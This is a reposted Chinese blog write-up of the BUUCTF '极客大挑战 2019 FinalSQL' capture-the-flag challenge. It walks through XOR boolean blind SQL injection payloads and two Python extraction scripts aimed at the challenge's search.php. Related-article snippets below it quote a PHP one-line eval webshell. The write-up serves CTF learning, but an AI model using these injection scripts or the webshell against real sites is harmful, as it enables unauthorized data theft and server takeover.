NO.2-26 [极客大挑战 2019]FinalSQL

最新推荐文章于 2024-03-16 07:00:00 发布
最新推荐文章于 2024-03-16 07:00:00 发布
阅读量201 收藏
点赞数
分类专栏: BUUCTF SQL注入
原文链接:https://www.cnblogs.com/wangtanzhi/p/12305052.html
版权

根据题目提示盲注,随便点几下找到注入点

发现我们输入^符号成功跳转页面,证明存在注入

1^(ord(substr((select(group_concat(schema_name))from(information_schema.schema
ta)),%d,1))=%d)^1"%(i,ord(j)) 获取数据库名称

1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)
where(table_schema)='geek'),%d,1))=%d)^1"%(i,ord(j)) 获取数据库表名

1^(ord(substr((select(group_concat(column_name))from(information_schema.column
s)where(table_name='F1naI1y')),%d,1))=%d)^1"%(i,ord(j))
获取数据库列名

获取flag:

import requests
url = "http://9c13f59b-720e-4c5a-9d63-69342c1be65a.node3.buuoj.cn/search.php"
for i in range(1,20):
    for j in range(1,128):
        d ="?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),'"+str(i)+"',1))='"+str(j)+"')^1"
        r = requests.get(url+d)
        if 'Click' in r.text:
            print(chr(j))
#然后是二分法,二分法要快很多:
# -*- coding: UTF-8 -*-
import re
import requests
import string
 
url = "http://5dbbc107-a871-4d45-940a-3b2712330fee.node3.buuoj.cn/search.php"
flag = ''
def payload(i,j):
    # sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)                                #数据库名字          
    # sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)^1"%(i,j)           #表名
    # sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1"%(i,j)        #列名
    sql = "1^(ord(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)^1"%(i,j)
    data = {"id":sql}
    r = requests.get(url,params=data)
    # print (r.url)
    if "Click" in r.text:
        res = 1
    else:
        res = 0
 
    return res
 
def exp():
    global flag
    for i in range(1,10000) :
        print(i,':')
        low = 31
        high = 127
        while low <= high :
            mid = (low + high) // 2
            res = payload(i,mid)
            if res :
                low = mid + 1
            else :
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)
 
exp()
print('flag=',flag)

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 484
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
[极客挑战 2019]FinalSQL 1
weixin_45577185的博客
10-12 423
开始试了试登录框,用sql注入,发现总是出现 后来发现url可能存在注入 通过bp,发现过滤了很多 输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’ 由于空格被过滤,用()代替。 import requests url = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php' flag = '' for i in range(1,250):# range.
[极客挑战 2019]FinalSQL
末初的CSDN博客
09-26 438
字段中(内容比较长,等待时间需要久一点,因为BUU发包太快会直接ban掉,就加个。测起来有点感觉过滤很奇怪。
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 396
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
BUUCTF-极客挑战2019
Atkx's Blog
01-27 661
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
SQL注入之——[极客挑战 2019]FinalSQL
qq_35015835的博客
11-22 486
[极客挑战 2019]FinalSQL 界面和之前发生一些变化。 采用和上一题一样的方式,判断在输入框中主要过滤了一些什么内容。 从结果中可以看出,在上一题的基础上又增加了一些符号的过滤,如上图彩色部分举例显示,这样造成的结果是,输入框部分不能进行一系列的注入操作,因为关键的字符全部都被过滤。 那么转向这个页面中和上一题不同的地方,就是那几个紫色的方块。 点击之后发现,在URL中有了参数值,那么这样初步将注入目标锁定在GET参数中。 对get字段是否过滤了字段进行检测。 上图中显示的蓝色部分就是被过
第五十八题——[极客挑战 2019]FinalSQL
分享简单的安全技术
05-08 782
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到sql测试框,以及1,2,3,4,5超链接 第二步:测试漏洞点 点击1超链接后出现NO! Not this! Click others~~~字样,在URL地址栏添加^2后发现注入点 第三步:获取flag 由于^一般适用于盲注猜测ASCII码值,所以这里使用盲注获取flag 手动测试回显字样:输入http://d9cc6ff9-ac2f-4193-985d-dce132ad08bd.node3.buuoj.
[极客挑战 2019]FinalSQL ---不会编程的崽
不会编程的崽的博客
03-16 703
sql盲注
极客挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 808
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
微信小程序-极客学院.zip
04-14
你可以使用双大括号`{{ }}`将变量插入到WXML中,而这些变量的值是在JS中动态更新的。 3. **网络请求**:微信小程序提供了wx.request接口,用于向服务器发送HTTP请求,获取在线小说的数据。 4. **组件化开发**:...
极客网-2018新技术·新物种·新未来年度报告-2019.2-36页.pdf
04-25
极客网-2018新技术·新物种·新未来年度报告-2019.2-36页.pdf
yanglr.github.io:极客玩家大白 - Github pages
07-23
极客玩家大白 的个人博客 托管在 Github pages,部署在 zeit.co (或称 now.sh,现) 原地址: 或 . 这是我的个人博客项目,里面会记录技术、运营和生活的点点滴滴。 访问地址: 或 大白技术控的技术博客,兼谈运营硬核...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
pi_heif-0.17.0-cp310-cp310-manylinux_2_17_aarch64.whl
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
Numper基础(一)
07-27
Numper基础(一)
C语言写的潮流计算大作业代码.zip
最新发布
07-27
c写的潮流计算大作业代码.zipc写的潮流计算大作业代码.zipc写的潮流计算大作业代码.zip
关于大模型的教程、调用和使用技巧的资源,帮助更多人高效地认知和使用大模型.docx
07-27
大模型(Large Models),尤其是指预训练的大规模语言模型,在自然语言处理(NLP)、计算机视觉(CV)等领域取得了显著的进步。以下是一些关于大模型的教程、调用和使用技巧的资源,帮助更多人高效地认知和使用大模型: 1. 大模型教程资源 官方文档: 大多数大型模型都会在其官方网站或GitHub页面上发布详细的文档,包括模型介绍、安装指南、使用示例等。 例如,Hugging Face的Transformers库提供了丰富的文档和教程。 在线课程: Coursera、edX等在线教育平台上提供了关于大模型的课程。 例如,斯坦福大学的NLP课程通常会涵盖最新的大模型技术。 博客文章: Medium、Towards Data Science等平台上有很多关于大模型的文章,这些文章通常由专业人士撰写,包含实战经验和技巧。 视频教程: B站(bilibili.com)和YouTube上有很多关于大模型的教程视频,适合初学者入门。 2. 调用API和使用技巧 Hugging Face Transformers: 提供了多种预训练模型的加载和调用方式。 Hugging Face文档 是一个非常
pi_heif-0.17.0-cp39-cp39-macosx_14_0_arm64.whl
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
[极客挑战 2019]EasySQL 1
08-24
[极客挑战 2019]EasySQL 1是一道SQL注入题目。根据引用和引用中的示例,可以看出在payload中通过在注入点添加"or 1=1#"实现绕过了原本的认证逻辑,使得查询返回的结果总是为真。这样攻击者可以通过注入恶意代码来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值